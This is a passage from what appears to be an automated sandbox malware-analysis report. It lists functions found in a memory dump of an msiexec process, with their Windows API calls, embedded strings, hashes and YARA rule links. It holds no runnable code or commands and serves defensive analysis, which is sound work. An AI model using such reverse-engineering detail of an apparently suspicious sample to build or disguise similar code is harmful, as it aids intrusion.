                                                                                        • Opcode Fuzzy Hash: 99952dbbdb1bfba8fd85830a5d685bc4282b7af98e1c6427db74e5cbed68ad45
                                                                                        • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                        Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                        • RegisterClassW.USER32(?), ref: 00412428
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                        • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2678498856-0
                                                                                        • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                        • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                        • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                        • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                        Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                        • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                        • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                        • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Item
                                                                                        • String ID:
                                                                                        • API String ID: 3888421826-0
                                                                                        • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                        • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                        • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                        • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                        Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00417B7B
                                                                                        • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                        • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                        • GetLastError.KERNEL32 ref: 00417BB5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$ErrorLastLockUnlockmemset
                                                                                        • String ID:
                                                                                        • API String ID: 3727323765-0
                                                                                        • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                        • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                        • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                        • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                        Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040F673
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                        • strlen.MSVCRT ref: 0040F6A2
                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 2754987064-0
                                                                                        • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                        • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                        • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                        • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                        Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040F6E2
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                        • strlen.MSVCRT ref: 0040F70D
                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 2754987064-0
                                                                                        • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                        • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                        • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                        • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                        Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00402FD7
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                        • strlen.MSVCRT ref: 00403006
                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 2754987064-0
                                                                                        • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                        • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                        • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                        • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                        Function 00414770 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcscpy$CloseHandle
                                                                                        • String ID: General
                                                                                        • API String ID: 3722638380-26480598
                                                                                        • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                        • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                        • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                        • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                        Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                          • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                          • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                        • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                        • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                        • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                        • String ID:
                                                                                        • API String ID: 764393265-0
                                                                                        • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                        • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                        • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                        • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                        Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$System$File$LocalSpecific
                                                                                        • String ID:
                                                                                        • API String ID: 979780441-0
                                                                                        • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                        • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                        • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                        • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                        Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                        • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                        • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$DialogHandleModuleParam
                                                                                        • String ID:
                                                                                        • API String ID: 1386444988-0
                                                                                        • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                        • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                        • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                        • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                        Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??3@
                                                                                        • String ID:
                                                                                        • API String ID: 613200358-0
                                                                                        • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                        • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                        • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                        • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                        Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                        • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: InvalidateMessageRectSend
                                                                                        • String ID: d=E
                                                                                        • API String ID: 909852535-3703654223
                                                                                        • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                        • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                        • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                        • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                        Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • wcschr.MSVCRT ref: 0040F79E
                                                                                        • wcschr.MSVCRT ref: 0040F7AC
                                                                                          • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                          • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcschr$memcpywcslen
                                                                                        • String ID: "
                                                                                        • API String ID: 1983396471-123907689
                                                                                        • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                        • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                        • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                        • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                        Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                        • _memicmp.MSVCRT ref: 0040C00D
                                                                                        • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FilePointer_memicmpmemcpy
                                                                                        • String ID: URL
                                                                                        • API String ID: 2108176848-3574463123
                                                                                        • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                        • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                        • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                        • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                        Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _snwprintf.MSVCRT ref: 0040A398
                                                                                        • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _snwprintfmemcpy
                                                                                        • String ID: %2.2X
                                                                                        • API String ID: 2789212964-323797159
                                                                                        • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                        • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                        • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                        • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                        Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _snwprintf
                                                                                        • String ID: %%-%d.%ds
                                                                                        • API String ID: 3988819677-2008345750
                                                                                        • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                        • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                        • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                        • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                        Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040E770
                                                                                        • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendmemset
                                                                                        • String ID: F^@
                                                                                        • API String ID: 568519121-3652327722
                                                                                        • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                        • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                        • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                        • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                        Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: PlacementWindowmemset
                                                                                        • String ID: WinPos
                                                                                        • API String ID: 4036792311-2823255486
                                                                                        • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                        • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                        • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                        • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                        Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                        • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??3@DeleteObject
                                                                                        • String ID: r!A
                                                                                        • API String ID: 1103273653-628097481
                                                                                        • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                        • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                        • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                        • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                        Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                        • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                        • wcscat.MSVCRT ref: 0040DCFF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileModuleNamewcscatwcsrchr
                                                                                        • String ID: _lng.ini
                                                                                        • API String ID: 383090722-1948609170
                                                                                        • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                        • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                        • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                        • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                        Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                        • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                        • API String ID: 2773794195-880857682
                                                                                        • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                        • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                        • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                        • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                        Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                        • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                        • memset.MSVCRT ref: 0042BAAE
                                                                                        • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memset
                                                                                        • String ID:
                                                                                        • API String ID: 438689982-0
                                                                                        • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                        • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                        • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
